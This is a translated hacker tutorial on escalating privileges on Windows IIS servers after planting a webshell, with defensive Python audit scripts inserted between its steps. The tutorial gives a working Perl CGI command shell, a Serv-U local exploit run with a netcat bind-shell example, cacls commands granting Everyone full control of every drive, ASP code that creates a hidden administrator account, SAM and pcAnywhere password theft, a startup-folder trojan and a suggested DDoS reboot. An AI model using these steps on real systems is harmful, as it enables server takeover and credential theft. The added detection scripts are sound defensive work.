Ultimate privilege-escalation skills


Author: WekweN

http://www.wrsky.com

This article brings together privilege-escalation techniques and ideas from many experienced people.

When we get a WebShell, the next thing to do is escalate privileges.

My personal summary is as follows:

1. C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

See whether you can browse into this directory. If you can, that is the best case: download the .CIF file straight from it, recover the pcAnywhere password from it, and log in.

PS: cracking tools for the .CIF file exist; look for them yourselves!

2. C:\WINNT\system32\config\

Get into this directory and take the SAM file, then crack the users' passwords.

Software for cracking SAM passwords: LC, SAMInside.

3. C:\Documents and Settings\All Users\"Start" menu\Programs\

If you can browse here, you can gather a lot of useful information.

You will see many shortcuts. We generally pick Serv-U, then view the shortcut's properties locally to learn its install path, and see whether you can browse to that path.

Once inside, if you have permission to modify ServUDaemon.ini, add a user with an empty password:

[USER=wekwen|1]
Password=
HomeDir=C:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=D:\|RWAMELCDP
Access3=F:\|RWAMELCDP
SKEYValues=

This user has the highest privileges (Maintenance=System makes it a Serv-U server administrator, and the Access lines give it every right on each drive root); we can then FTP in and run "quote site exec xxx" to execute commands and escalate.
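A defender reading the INI fragment above wants a way to spot such an account in ServUDaemon.ini. The Python below is an added example, not code from the article or from Serv-U: it parses a constructed INI (the injected account beside a normal one) and flags the settings that amount to full server control, namely an empty password, Maintenance=System, a drive-root home directory, and AccessN rules that grant the execute flag (E) on a drive root. The key names follow the fragment above; the sample data and the second account are constructed.

```python
"""Audit ServUDaemon.ini for accounts with server-administrator rights (added example)."""
import re

# Constructed sample: one normal account plus an injected one; not from a real server.
SAMPLE_INI = """\
[GLOBAL]
Version=5.2.0.0

[USER=ftpuser|1]
Password=ah1D3F7A0C2B9E
HomeDir=D:\\ftproot\\ftpuser
TimeOut=600
Access1=D:\\ftproot\\ftpuser|RWAMLCDP

[USER=wekwen|1]
Password=
HomeDir=C:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access2=D:\\|RWAMELCDP
Access3=F:\\|RWAMELCDP
SKEYValues=
"""

DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")   # matches "C:" or "C:\"
USER_HEADER = re.compile(r"^\[USER=([^|\]]+)", re.IGNORECASE)


def parse_users(ini_text):
    """Return {user_name: {key: value}} for every [USER=...] section."""
    users, current = {}, None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = USER_HEADER.match(line)
        if header:
            current = header.group(1)
            users[current] = {}
        elif line.startswith("["):
            current = None            # some other section, e.g. [GLOBAL]
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            users[current][key.strip()] = value.strip()
    return users


def audit_users(users):
    """Return (user, reason) pairs for settings that amount to full server control."""
    findings = []
    for name, keys in users.items():
        if keys.get("Password", "set") == "":
            findings.append((name, "empty password"))
        if keys.get("Maintenance", "").lower() == "system":
            findings.append((name, "Maintenance=System (Serv-U server administrator)"))
        if DRIVE_ROOT.match(keys.get("HomeDir", "")):
            findings.append((name, "home directory is a drive root"))
        for key, value in keys.items():
            if key.lower().startswith("access"):
                path, _, flags = value.partition("|")
                if DRIVE_ROOT.match(path) and "E" in flags.upper():
                    findings.append((name, f"{key} grants execute (E) on drive root {path}"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_users(parse_users(SAMPLE_INI)):
        print(f"{user}: {reason}")
```

Run it against a real ServUDaemon.ini by reading the file into parse_users; every line of output is a setting worth explaining, and the normal account in the sample produces none.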

4. C:\WINNT\system32\inetsrv\data\

This directory also gives Everyone full control. What we do here is upload the privilege-escalation tools into it and then run them.

5. See whether you can browse to the following directories:

C:\PHP: use phpspy.

C:\Perl: it is not always this directory (you can also find the real path from a shortcut's properties, as above); use a CGI WebShell:

#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /g;
s/%2F/\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
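The CGI script above is a minimal command shell: whatever arrives in QUERY_STRING goes straight into system(). The Python below is an added example, not from the article, of the check a defender would run over the CGI scripts in a web root: it flags Perl sources in which request input (QUERY_STRING, CGI param(), STDIN) appears together with a shell-spawning call (system, exec, interpolated backticks, a piped open). The three sample scripts are constructed inline, and the heuristic is deliberately simple; it looks for co-occurrence, not real data flow, so treat hits as candidates for review.

```python
"""Flag CGI scripts that pass request input to a shell (added example)."""
import re

# Heuristic markers. Deliberately simple: co-occurrence, not data-flow analysis.
INPUT_SOURCES = [
    (re.compile(r"\$ENV\{\s*['\"]?QUERY_STRING"), "QUERY_STRING"),
    (re.compile(r"\bparam\s*\("), "CGI param()"),
    (re.compile(r"<STDIN>"), "STDIN (POST body)"),
]
SHELL_CALLS = [
    (re.compile(r"\bsystem\s*\("), "system()"),
    (re.compile(r"\bexec\s*\("), "exec()"),
    (re.compile(r"`[^`]*\$[^`]*`"), "backticks with an interpolated variable"),
    (re.compile(r"\bopen\s*\([^)]*\|"), "open() with a pipe"),
]

# Constructed sample scripts (not captured from a real server).
SAMPLE_FILES = {
    "cmd.pl": r"""#!/usr/bin/perl
$_ = $ENV{QUERY_STRING};
s/%20/ /g;
$execthis = $_;
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
""",
    "hello.pl": r"""#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "Hello, ", $ENV{QUERY_STRING}, "\n";
""",
    "report.pl": r"""#!/usr/bin/perl
print "Content-type: text/plain\n\n";
system("date");
""",
}


def classify_cgi(source):
    """Return the reasons a script looks like a command shell; [] when it does not."""
    sources = [name for rx, name in INPUT_SOURCES if rx.search(source)]
    calls = [name for rx, name in SHELL_CALLS if rx.search(source)]
    if not (sources and calls):
        return []
    return [f"request input ({', '.join(sources)}) reaches {call}" for call in calls]


def scan_files(files):
    """Map file name -> reasons, keeping only the suspicious scripts."""
    result = {}
    for name, source in files.items():
        reasons = classify_cgi(source)
        if reasons:
            result[name] = reasons
    return result


if __name__ == "__main__":
    for name, reasons in scan_files(SAMPLE_FILES).items():
        print(name, "->", "; ".join(reasons))
```

hello.pl echoes request input but never spawns a shell, and report.pl spawns a shell with a constant argument; neither is flagged, which is the distinction the co-occurrence rule is meant to make.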

Save it as a .cgi file and execute it.

If that does not work, try the .pl extension: rename the .cgi file you just saved to .pl and submit

http://anyhost/cmd.pl?dir

If it displays "Access denied", that shows the script is being executed! Submit right away: first upload su.exe (the Serv-U privilege-escalation tool) into Perl's bin directory, then submit

http://anyhost/cmd.pl?c:/perl/bin/su.exe

which returns:

Serv-U >3.x local exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

It is now running with IUSR privileges; submit:

http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe c:\ /e /t /g everyone:f"
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe d:\ /e /t /g everyone:f"
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe e:\ /e /t /g everyone:f"
http://anyhost/cmd.pl?c:/perl/bin/su.exe "cacls.exe f:\ /e /t /g everyone:f"

If the following output is returned, it succeeded:

Serv-U >3.x local exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
***************************************************************
>PASS #l@**@p
<230 User logged in, proceed.
***************************************************************
>SITE MAINTENANCE
***************************************************************
[ ] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
***************************************************************
Domain xl:2 created
Creating Evil User
<200-User=xl
200 User settings saved
***************************************************************
[ ] Now Exploiting...
>USER xl
<331 User name okay, need password.
***************************************************************
>PASS 111111
<230 User logged in, proceed.
***************************************************************
[ ] Now Executing: cacls.exe c:\ /e /t /g everyone:f
<220 Domain deleted

In this way every partition is under Everyone full control.
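The four cacls commands above give Everyone full control of every drive root, which is exactly the condition a defender should audit for. The Python below is an added example, not from the article: it parses constructed cacls output for two drive roots and reports ACEs that grant change, write or full control to a broad trustee (Everyone, BUILTIN\Users, BUILTIN\Guests, Authenticated Users, Anonymous Logon) or to any IUSR_ account. The constructed output uses drive roots only, so the parser assumes paths without spaces and takes the path as the first token of a non-indented line.

```python
"""Find broad write/full-control ACEs in cacls output (added example)."""
import re

# Constructed sample of `cacls` output for two drive roots (not captured from a real host).
SAMPLE_CACLS = """\
C:\\ BUILTIN\\Administrators:(OI)(CI)F
    NT AUTHORITY\\SYSTEM:(OI)(CI)F
    Everyone:(OI)(CI)F
    BUILTIN\\Users:(OI)(CI)R

D:\\ BUILTIN\\Administrators:(OI)(CI)F
    NT AUTHORITY\\SYSTEM:(OI)(CI)F
    BUILTIN\\Users:(OI)(CI)R
    IUSR_ANYHOST:(OI)(CI)C
"""

# Trustees that should never hold write rights on a drive root or a web/tool directory.
BROAD_TRUSTEES = {
    "everyone",
    r"builtin\users",
    r"builtin\guests",
    r"nt authority\authenticated users",
    r"nt authority\anonymous logon",
}
WRITE_PERMS = {"F", "C", "W"}   # cacls letters: F full, C change, W write (R read, N none)
ACE_FLAGS = re.compile(r"\([A-Z]+\)")   # inheritance flags such as (OI), (CI), (IO)


def parse_cacls(text):
    """Return (path, trustee, flags, perm) for each ACE.

    A line that does not start with whitespace names a new path and carries its first
    ACE; the indented lines that follow belong to the same path. The path is taken as
    the first whitespace-delimited token (assumption: no spaces in paths, true for roots).
    """
    aces, path = [], None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace():
            ace = raw.strip()
        else:
            path, _, ace = raw.partition(" ")
            ace = ace.strip()
        trustee, _, rest = ace.rpartition(":")
        flags = "".join(ACE_FLAGS.findall(rest))
        perm = ACE_FLAGS.sub("", rest)
        aces.append((path, trustee, flags, perm))
    return aces


def risky_aces(aces):
    """ACEs that give a broad trustee, or any IUSR_ account, write-or-better access."""
    out = []
    for path, trustee, _flags, perm in aces:
        low = trustee.lower()
        if (low in BROAD_TRUSTEES or low.startswith("iusr_")) and perm in WRITE_PERMS:
            out.append((path, trustee, perm))
    return out


if __name__ == "__main__":
    for path, trustee, perm in risky_aces(parse_cacls(SAMPLE_CACLS)):
        print(f"{path} {trustee}: {perm}")
```

Feeding it the output of "cacls c:\ /t" covers every file under the drive, which is what the /t in the article's own command touches.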

Now we make our user an administrator:

http://anyhost/cmd.pl?c:/perl/bin/su.exe "net localgroup administrators IUSR_anyhost /add"

6. You can run "cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps" to escalate privileges.

Run "cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps" to view the privileged DLLs, that is, the ISAPI extensions loaded in-process by inetinfo.exe and therefore running as LocalSystem: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

Add asp.dll to this privileged list.

asp.dll is located at c:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on every machine).

Now we add it:

cscript adsutil.vbs set /w3svc/inprocessisapiapps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll" "c:\winnt\system32\inetsrv\asp.dll"

You can run "cscript adsutil.vbs get /w3svc/inprocessisapiapps" to check that it was added.
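Appending asp.dll to InProcessIsapiApps is what makes ASP pages run inside inetinfo.exe, so the list is worth comparing against a known-good baseline. The Python below is an added example, not from the article and not part of Microsoft's adsutil.vbs: it pulls the quoted DLL paths out of text modelled on the output of the get command above (the layout is approximated and the sample is constructed) and compares them with the five-DLL baseline the article lists, reporting any extra entry and any entry outside %SystemRoot%\system32, as well as baseline entries that have gone missing.

```python
"""Check the IIS in-process ISAPI list against a baseline (added example)."""
import ntpath
import re

# Baseline: the five DLLs the article shows in a default IIS 5 in-process list.
EXPECTED_INPROC = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}

# Constructed text modelled on `adsutil.vbs get w3svc/inprocessisapiapps` output after
# asp.dll has been appended; the layout is approximated, not captured from a real host.
SAMPLE_ADSUTIL = """\
InProcessIsapiApps              : (LIST) (6 Items)
  "C:\\WINNT\\system32\\idq.dll"
  "C:\\WINNT\\system32\\inetsrv\\httpext.dll"
  "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll"
  "c:\\winnt\\system32\\inetsrv\\ssinc.dll"
  "c:\\winnt\\system32\\msw3prt.dll"
  "c:\\winnt\\system32\\inetsrv\\asp.dll"
"""


def parse_inproc_list(text):
    """Return the quoted DLL paths in the order adsutil printed them."""
    return re.findall(r'"([^"]+)"', text)


def audit_inproc(entries, expected=EXPECTED_INPROC, system_root=r"c:\winnt"):
    """Report entries not in the baseline or located outside %SystemRoot%\\system32."""
    findings = []
    system32 = system_root.lower() + "\\system32\\"
    for entry in entries:
        if ntpath.basename(entry).lower() not in expected:
            findings.append((entry, "not in the expected in-process list"))
        if not entry.lower().startswith(system32):
            findings.append((entry, "outside %SystemRoot%\\system32"))
    return findings


def missing_from_baseline(entries, expected=EXPECTED_INPROC):
    """Baseline DLLs that have been removed from the list (also worth a look)."""
    present = {ntpath.basename(entry).lower() for entry in entries}
    return expected - present


if __name__ == "__main__":
    entries = parse_inproc_list(SAMPLE_ADSUTIL)
    for entry, reason in audit_inproc(entries):
        print(f"{entry}: {reason}")
    print("missing:", sorted(missing_from_baseline(entries)) or "none")
```

The system_root parameter is a hypothetical default for the sample; on a real host pass the actual %SystemRoot%, and extend EXPECTED_INPROC with whatever your own configuration legitimately loads in-process.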

7. You can also try this code to escalate, though its effect does not seem to be obvious:

<%@ codepage=936%>
<% response.expires=0
on error resume next
session.timeout=50
server.scripttimeout=3000
set lp=server.createObject("wscript.network")
oz="WinNT://" & lp.computername
set ob=getObject(oz)
set oe=getObject(oz & "/administrators,group")
set od=ob.create("user","wekwen$")
od.setPassword "wekwen"   '<----- password
od.setInfo
set of=getObject(oz & "/wekwen$,user")
oe.add(of.adspath)
response.write "wekwen$ super account created!"
%>

Use this code to check whether it worked:

<%@ codepage=936%>
<% response.expires=0
on error resume next 'enumerate the accounts in the Administrators group
set tn=server.createObject("wscript.network")
set objgroup=getObject("WinNT://" & tn.computername & "/administrators,group")
for each admin in objgroup.members
response.write admin.name & "<br>"
next
if err then
response.write "No, WScript.Network"
end if
%>
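Both the su.exe command earlier ("net localgroup administrators IUSR_anyhost /add") and the ASP snippet above (the wekwen$ account) leave an unexpected member in the local Administrators group, which is what the check above enumerates. The Python below is an added example, not from the article: it parses constructed "net localgroup administrators" output and flags members outside a baseline set, IIS IUSR_/IWAM_ accounts, and names ending in "$" (which a plain "net user" listing omits, the reason such names are chosen). The baseline set is an assumption for the sample host.

```python
"""Audit local Administrators membership from `net localgroup` output (added example)."""

# Assumption: on this host only the built-in Administrator should be a member.
BASELINE_ADMINS = {"administrator"}

# Constructed sample of `net localgroup administrators` output (not from a real host).
SAMPLE_NET_LOCALGROUP = """\
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
IUSR_ANYHOST
wekwen$
The command completed successfully.
"""


def parse_members(text):
    """Return the member names listed between the dashed rule and the closing line."""
    members, in_list = [], False
    for line in text.splitlines():
        if line.startswith("The command completed"):
            break
        if line.startswith("----"):
            in_list = True
        elif in_list and line.strip():
            members.append(line.strip())
    return members


def audit_admins(members, baseline=BASELINE_ADMINS):
    """Return (member, [reasons]) for every member that deserves attention."""
    findings = []
    for member in members:
        low = member.lower()
        reasons = []
        if low.endswith("$"):
            reasons.append("name ends with '$' (hidden from a plain `net user` listing)")
        if low.startswith(("iusr_", "iwam_")):
            reasons.append("IIS anonymous/process account must not be an administrator")
        if low not in baseline:
            reasons.append("not in the baseline set")
        if reasons:
            findings.append((member, reasons))
    return findings


if __name__ == "__main__":
    for member, reasons in audit_admins(parse_members(SAMPLE_NET_LOCALGROUP)):
        print(f"{member}: {'; '.join(reasons)}")
```

Run on a schedule and diffed against the previous run, this turns the ASP snippet's "super account" into an alert rather than a surprise.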

8. C:\Program Files\Java Web Start\

If you can get in here, the privileges are generally low; you can try a JSP WebShell. I have heard its privileges are also low, but I have not come across it myself.

9. Finally, if the host is locked down extremely hard, you can try writing a BAT, VBS or other trojan into C:\Documents and Settings\All Users\"Start" menu\Programs\Startup\.

Then wait until the host restarts, or force it to restart with a DDoS, to achieve the escalation.

In summary: find a directory that is both writable and executable, upload the escalation tool into it, and finally run it. Three words: "find", "upload", "execute".

The above is my own experience; everyone has many methods, so please share them.

Wekwen

04.12.12

Please cite the original URL when reposting: https://www.9cbs.com/read-80768.html
